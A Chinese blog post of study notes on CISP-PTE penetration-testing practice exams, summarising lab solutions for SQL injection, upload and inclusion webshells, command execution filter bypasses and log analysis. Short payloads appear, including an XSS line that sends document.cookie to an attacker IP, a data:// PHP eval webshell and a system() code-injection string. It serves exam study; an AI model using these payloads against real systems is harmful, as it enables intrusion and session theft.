<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/letter-k.svg">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/letter-k.svg">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"guayu-kakeru.github.io","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":"ture","show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="记录cisp-pte的基础题学习和刷题的笔记">
<meta property="og:type" content="article">
<meta property="og:title" content="cisp-pte基础题笔记">
<meta property="og:url" content="https://guayu-kakeru.github.io/posts/19448.html">
<meta property="og:site_name" content="guayu-kakeru">
<meta property="og:description" content="记录cisp-pte的基础题学习和刷题的笔记">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://pic1.imgdb.cn/item/68a82cab58cb8da5c842a678.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/68b1748b58cb8da5c8617f51.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/68b175b458cb8da5c8617ffa.png">
<meta property="article:published_time" content="2025-08-29T09:43:02.000Z">
<meta property="article:modified_time" content="2025-08-30T10:30:04.958Z">
<meta property="article:author" content="guayu-kakeru">
<meta property="article:tag" content="cisp-pte">
<meta property="article:tag" content="渗透">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://pic1.imgdb.cn/item/68a82cab58cb8da5c842a678.png">

<link rel="canonical" href="https://guayu-kakeru.github.io/posts/19448.html">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>cisp-pte基础题笔记 | guayu-kakeru</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">guayu-kakeru</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签<span class="badge">15</span></a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类<span class="badge">15</span></a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档<span class="badge">81</span></a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://guayu-kakeru.github.io/posts/19448.html">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.jpg">
      <meta itemprop="name" content="guayu-kakeru">
      <meta itemprop="description" content="一年过后，你会希望从今天就开始行动。">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="guayu-kakeru">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          cisp-pte基础题笔记
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2025-08-29 17:43:02" itemprop="dateCreated datePublished" datetime="2025-08-29T17:43:02+08:00">2025-08-29</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2025-08-30 18:30:04" itemprop="dateModified" datetime="2025-08-30T18:30:04+08:00">2025-08-30</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E7%AC%94%E8%AE%B0/" itemprop="url" rel="index"><span itemprop="name">笔记</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E7%AC%94%E8%AE%B0/cisp-pte/" itemprop="url" rel="index"><span itemprop="name">cisp-pte</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
      
      
      
        <p>记录cisp-pte的基础题学习和刷题的笔记</p>
<span id="more"></span>
<h1 id="第一部分"><a href="#第一部分" class="headerlink" title="第一部分"></a>第一部分</h1><p>参考<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_45813980/article/details/134488597"># CISP-PTE八套真题详解（侵删）</a>的学习笔记</p>
<h2 id="第一套题目"><a href="#第一套题目" class="headerlink" title="第一套题目"></a>第一套题目</h2><p>sql注入：<br>order by没有用，直接进入union select阶段，找到有回显的字段2和3。后面就是常规的union注入</p>
<p>文件上传：<br>关键词被过滤 上传preg_replace.php 不使用eval的免杀马<br><a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/536097761">一句话木马</a><br><a target="_blank" rel="noopener" href="https://lbsucceed.github.io/posts/yi-ju-hua-mu-ma-jian-dan-xue-xi/#str-replace-han-shu">php函数一句话木马</a></p>
<p>文件包含：<br>尝试data:&#x2F;&#x2F;text&#x2F;plain,<?php phpinfo(); ?> 发现phpinfo还在但是data:&#x2F;&#x2F;被替换成空了，所以用双写绕过。 然后上传一句话木马用antsword连接</p>
<p>反序列化：<br>非常简单的反序列化，只要有一个php环境输出序列化的结果就好，可以在上一题的文件中写入，然后访问得到字符串</p>
<p>越权：<br>先用XFF头修改为本地IP  然后再Cookie中修改Username为admin的base64并且把isAdmin修改成true</p>
<h2 id="第二套题目"><a href="#第二套题目" class="headerlink" title="第二套题目"></a>第二套题目</h2><p>sql注入：<br>用’)闭合前面的内容  最后用注释后面的内容  过滤空格用注释绕过  union被过滤用双写绕过 使用load_file()函数直接读取文件里面的内容</p>
<p>文件上传：<br>就考察后缀名的替换 改成pht等就可以绕过</p>
<p>文件包含：<br>可以用data伪协议写webshell然后用蚁剑连接 或者用php filter读源码</p>
<p>命令执行：<br>cat命令被过滤  用其他的方式读文件<br><img src="https://pic1.imgdb.cn/item/68a82cab58cb8da5c842a678.png"></p>
<p>日志分析：<br>先筛选200 再搜索中的书签 选择删除未标记行 可以看到admin登录的路径  爆破admin的密码 ，登录之后拿到key</p>
<h2 id="第三套题目"><a href="#第三套题目" class="headerlink" title="第三套题目"></a>第三套题目</h2><p>sql注入：<br>这题考察的是二阶注入，有注册用户和重置密码的功能。 重置密码的语句是<code>update user set password = &#39;&#39; where username= &#39;&#39; </code> 所以只要注册一个<code>admin&#39;#</code> 用户，这样在修改这个用户的密码的时候就修改了admin的密码 然后可以登入admin</p>
<p>文件上传：<br>上传免杀马 绕过内容过滤</p>
<p>文件包含：<br>查看view.html 审计代码 发现要传入一个Hello参数 还要一个z0 输入想要执行的代码的base64</p>
<p>代码审计：<br>传入cmd参数 执行命令 然后重定向到一个文件中查看输出结果</p>
<p>代码执行：<br>管道符被过滤 使用 &amp;&amp;   过滤了php 使用*模糊匹配</p>
<h2 id="第四套题目"><a href="#第四套题目" class="headerlink" title="第四套题目"></a>第四套题目</h2><p>sql注入：<br>和第三套的题目差不多  区别是这里admin’#被注册了 需要在注册admin’#123 后面加上字符的</p>
<p>文件上传：<br>免杀马  用preg_replace的就可以</p>
<p>文件包含：<br>和上一套一样</p>
<p>日志分析：<br>用正则表达式筛选出状态码是200的记录 然后匹配出index upload 等四个路径，需要用正则去掉这四个路径<br>有的index前面有两个&#x2F; 所以正则中也要去掉这种情况 最终找到一个backdoor文件<br><code>^.*&quot;[A-Z]+ /(?!/?(index|manage|footer|upload)).*\.php.*&quot; 200</code><br>&#x2F;?表示可能有&#x2F; 可能没有&#x2F;</p>
<p>代码审计：<br>要构造一个json数据  第一个要求bar1不能是数字 但是要大于2020 所以用数字加字母，在php比较的时候会自动转换成数字比较  bar2要求元素是5个，第一个元素是数组  bar3要求是数组，并且有”cisp-pte”</p>
<h2 id="第五套题目"><a href="#第五套题目" class="headerlink" title="第五套题目"></a>第五套题目</h2><p>sql注入：我是差不多先生<br>注册登录之后 发现可以发表文章，在title和content处测试 发现都有注入点<br>在使用#注释之后还是发布失败，猜测还有user字段，sql语句可能是<br><code>insert into aritcles(title,content,user) values(&#39;tit&#39;,&#39;con&#39;,&#39;test&#39;)</code><br>输入的参数数量必须和列数一样才可以在content后面一个参数就是用户名<br><code>title=test&amp;content=test&#39;,&#39;test&#39;)#</code><br>然后在content处使用注入得到数据库名<code>title=123&#39;,(database()),&#39;test&#39;)#&amp;content=test</code><br>尝试得到表名的时候发现失败，可能存在过滤 用一些大小写过滤然后用 /**/ 绕过空格<br>最后得到password列的值<br>扩展： 如果没有注释符的时候 insert 可以同时插入多条语句，我们利用这个特性，可以将后面的语句进行闭合，成为另一个语句，先尝试使用 (’ 进行闭合<br>用<code>title=123&#39;,&#39;123&#39;,&#39;test&#39;),(&#39;&amp;content=test</code>测试失败，原因是在title前面还有一个参数<br><code>title=title1&#39;,&#39;content1&#39;,&#39;test&#39;),(&#39;x&#39;,&#39;title2&amp;content=content2</code> 这样就相当于发布两篇文章</p>
<p>文件上传 文件包含  命令执行  都和之前一样 </p>
<p>验证码爆破：<br>直接删除cookie  然后把验证码code字段置空</p>
<h2 id="第六套题目"><a href="#第六套题目" class="headerlink" title="第六套题目"></a>第六套题目</h2><p>sql注入：<br>考察万能密码<br>用户名处 <code>admin &#39;=&#39;</code> 密码处 <code>1&#39; Or &#39;1&#39;=&#39;1</code></p>
<p>sql注入：<br>用–+ 注释  根据sql语句用’)闭合 用order by 尝试 发现有7个字段<br>用union联合查询的时候 发现被过滤 用双写绕过<br>最后用load_file读取key </p>
<p>xss：<br>考察用xss获取admin的cookie然后登录admin<br>payload:<br><code>&lt;sript&gt;document.write(&#39;&lt;img src=&quot;http://192.168.xx.xx?xxxx?&#39; + document.cookie + &#39;&quot; /&gt;&#39;); &lt;/script&gt;</code><br>然后在攻击端口开http服务 就可以在url中看到cookie<br><img src="https://pic1.imgdb.cn/item/68b1748b58cb8da5c8617f51.png"><br>用cookie登录后可以看到key</p>
<p>文件包含：<br>就是考察文件包含<br><code>?data://text/plain,&lt;?php @eval($_POST[&#39;x&#39;]); ?&gt;</code> 然后用蚁剑连接之后找到flag</p>
<p>代码审计<br><img src="https://pic1.imgdb.cn/item/68b175b458cb8da5c8617ffa.png"><br>用闭合+命令的方式<br>payload: <code>?a=&quot;);system(&quot;ls</code></p>
<h1 id="第二部分"><a href="#第二部分" class="headerlink" title="第二部分"></a>第二部分</h1><p>在培训提供平台上的题目练习</p>

    </div>

    
    
    
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>guayu-kakeru
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="https://guayu-kakeru.github.io/posts/19448.html" title="cisp-pte基础题笔记">https://guayu-kakeru.github.io/posts/19448.html</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>


      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/cisp-pte/" rel="tag"># cisp-pte</a>
              <a href="/tags/%E6%B8%97%E9%80%8F/" rel="tag"># 渗透</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/posts/13378.html" rel="prev" title="cisp-pte客观题笔记">
      <i class="fa fa-chevron-left"></i> cisp-pte客观题笔记
    </a></div>
      <div class="post-nav-item">
    <a href="/posts/59614.html" rel="next" title="CISP-PTE综合题做题笔记">
      CISP-PTE综合题做题笔记 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%AC%AC%E4%B8%80%E9%83%A8%E5%88%86"><span class="nav-text">第一部分</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%AC%AC%E4%B8%80%E5%A5%97%E9%A2%98%E7%9B%AE"><span class="nav-text">第一套题目</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%AC%AC%E4%BA%8C%E5%A5%97%E9%A2%98%E7%9B%AE"><span class="nav-text">第二套题目</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%AC%AC%E4%B8%89%E5%A5%97%E9%A2%98%E7%9B%AE"><span class="nav-text">第三套题目</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%AC%AC%E5%9B%9B%E5%A5%97%E9%A2%98%E7%9B%AE"><span class="nav-text">第四套题目</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%AC%AC%E4%BA%94%E5%A5%97%E9%A2%98%E7%9B%AE"><span class="nav-text">第五套题目</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%AC%AC%E5%85%AD%E5%A5%97%E9%A2%98%E7%9B%AE"><span class="nav-text">第六套题目</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%AC%AC%E4%BA%8C%E9%83%A8%E5%88%86"><span class="nav-text">第二部分</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="guayu-kakeru"
      src="/images/avatar.jpg">
  <p class="site-author-name" itemprop="name">guayu-kakeru</p>
  <div class="site-description" itemprop="description">一年过后，你会希望从今天就开始行动。</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">81</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">15</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">15</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/guayu-kakeru" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;guayu-kakeru" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="/1806449041@qq.com" title="E-Mail → 1806449041@qq.com"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>



  <div class="links-of-recent-posts motion-element">
    <div class="links-of-recent-posts-title">
      <i class="fa fa-history fa-fw"></i>
      最近文章
    </div>
    <ul class="links-of-recent-posts-list">
        <li class="links-of-recent-posts-item">
          <a href="/posts/59614.html" title="posts&#x2F;59614.html">CISP-PTE综合题做题笔记</a>
        </li>
        <li class="links-of-recent-posts-item">
          <a href="/posts/19448.html" title="posts&#x2F;19448.html">cisp-pte基础题笔记</a>
        </li>
        <li class="links-of-recent-posts-item">
          <a href="/posts/13378.html" title="posts&#x2F;13378.html">cisp-pte客观题笔记</a>
        </li>
        <li class="links-of-recent-posts-item">
          <a href="/posts/36422.html" title="posts&#x2F;36422.html">Vulnhub-Pwnlab:init</a>
        </li>
        <li class="links-of-recent-posts-item">
          <a href="/posts/60109.html" title="posts&#x2F;60109.html">Vulnhub-Me and My Girlfriend</a>
        </li>
    </ul>
  </div>
      </div>

      
      
        <div class="links-of-blogroll motion-element links-of-blogroll-undefined">
          <div class="links-of-blogroll-title">
            <i class="fa fa-history fa-" aria-hidden="true"></i>
            
          </div>
          <ul class="links-of-blogroll-list">
            
            
              <li class="recent_posts_li">
                <a href="/" title="" target="_blank"></a>
              </li>
            
              <li class="recent_posts_li">
                <a href="/" title="" target="_blank"></a>
              </li>
            
              <li class="recent_posts_li">
                <a href="/" title="" target="_blank"></a>
              </li>
            
              <li class="recent_posts_li">
                <a href="/" title="" target="_blank"></a>
              </li>
            
              <li class="recent_posts_li">
                <a href="/" title="" target="_blank"></a>
              </li>
            
          </ul>
        </div>
      
    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2025</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">guayu-kakeru</span>
</div>



        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
